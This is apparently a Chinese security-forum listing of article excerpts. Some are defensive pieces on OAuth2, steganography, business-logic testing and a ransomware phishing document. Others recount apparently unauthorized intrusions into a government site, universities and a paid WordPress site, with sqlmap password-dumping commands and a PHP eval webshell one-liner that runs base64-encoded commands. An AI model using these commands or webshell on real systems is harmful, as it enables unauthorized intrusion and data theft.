渗透测试
某建设工程质量监督站sa权限注入加提权
大家好,希望加入t00ls这个大家庭。先找到注入点然后放到sqlmap里面跑sqlmap.py -u http://www.xxx.com/details.aspx?id=8 --current-userSa权限,激动的说不出话了用命令直接读sa密码吧E:\python\sqlmapsqlmap.py u http://www.xxx.com/details.aspx?id=8--passwords -U sado you want to us
渗透某名牌大学至内网小览
看我如何拿下某学校的服务的*注:不是我所在的学校~表示现在是中专。。。没毕业的那种渣渣。。。*注:表示初中毕业,文采没有那么好。。。 今天,看到一个某名牌大学的网站,顿时欲望四起。网站首页↓【信息收集】得到搭建平台为 Apache脚本php 5.2.14Burp得到IP,经综合测试后确认为真实IP。Burp爬行
业务流程安全分析
导语:在针对业务系统进行渗透测试的过程中,随着发现漏洞数量增多,其对业务安全性的提升效果真的就更好吗?不尽然,若项目组中部分测试人员的测试方法论存在偏差,导致其测试只为了发现漏洞交差,而忽视了渗透测试应全面覆盖业务流程与功能,这样的测试结果价值有待商榷。想起来之前的老大曾说过:“
深入理解JPEG图像格式Jphide隐写
## 0x00 隐写原理 ##Jphide是基于最低有效位LSB的JPEG格式图像隐写算法,使用JPEG图像作为载体是因为相比其他图像格式更不容易发现隐藏信息,因为JPEG图像在DCT变换域上进行隐藏比空间域隐藏更难检测,并且鲁棒性更强,同时Blowfish算法有较强的抗统计检测能力。由于JPEG图像格式使用离散余弦变换(Dis
第三方登录中OAuth2协议使用安全问题
在没有真正接触OAuth的真正概念时,先接触的是使用第三方登录来登录应用,而在理解客户端和资源服务器之间的关系时,我一直认为第三方应用是资源服务器,而像QQ、新浪这种属于客户端,因为第三方应用授权给了QQ、新浪,让资源所有者的使用QQ、新浪等的账户来登录第三方应用。0x01 基本知识OAuth(Open
警惕勒索软件,别乱打开office文档
前两天公司邮箱突然收到一封鸟语邮件,一开始以为是普通广告垃圾邮件,后来一看还带着docm的附件,就知道这肯定是钓鱼邮件,今天正好有时间分析一下邮件内容如图:把这些鸟语放到在线翻译上检测了下,翻译成中文是这样的:你好,讨论的最后两个附上发票,请解决亲切的问候,他avdyl把附件下载下来,用o
记一次对某大学教务网的检测
事情的起因是这样的,在某大学读书的同学说他学修的一门课,忘了在网上报名了,于是找到屌丝的我,看我有没有办法帮他选下课,于是就有了下文。我先看了下他们的教务网,正方的。。这货不是之前就爆出漏洞注入了的吗,这么久了,也不知道修复了没的 漏洞链接http://www.wooyun.org/bugs/wooyun-2015-01
国内最大程序猿(大黑阔)培训基地—北大青鸟所有数据遭泄露
国内最大数据猿培训员基地—北大青鸟所有数据遭泄露(原文链接:http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2651948634&idx=1&sn=15ae692916ffaa7b12b47b91bee161cf&scene=1&srcid=041540D068aZ3g5HbS9bfBhg#rd)随着大数据时代的来临,数据已经渗透到当今的每一个行业中,成为非常重要的一个
一句话脱离菜刀执行命令
是否还在当心菜刀有后门导致webshell被盗?一句话就一定要在菜刀里使用?当然不是,我们完全可以模拟post包来实现一句话的执行,方法如下:1.假设一句话为:<?php eval($_POST)?>2.执行phpinfo()时post提交:cmd=phpinfo();执行tasklist时,post提交:cmd=$a=dGFza2xpc3Q;$b=base64_decode($a);system($b); (
记一次渗透过程(wpscan+LuManage(sql注入)+memcached未经授权访问)
- -注:网站打码较少,若通过的话,请小编补打下码网站是一个wordpress的福利站,需要充值vip才可以看内容,无奈我这种屌丝肯定不会花钱去买。于是就对网站下手了。先展示一下网站首页.(内容有点污QAQ,但我们讨论的是技术和渗透思路QAQ)Wordpress的站,首先想到的便是wpscan扫爆出了网站的robots.txt,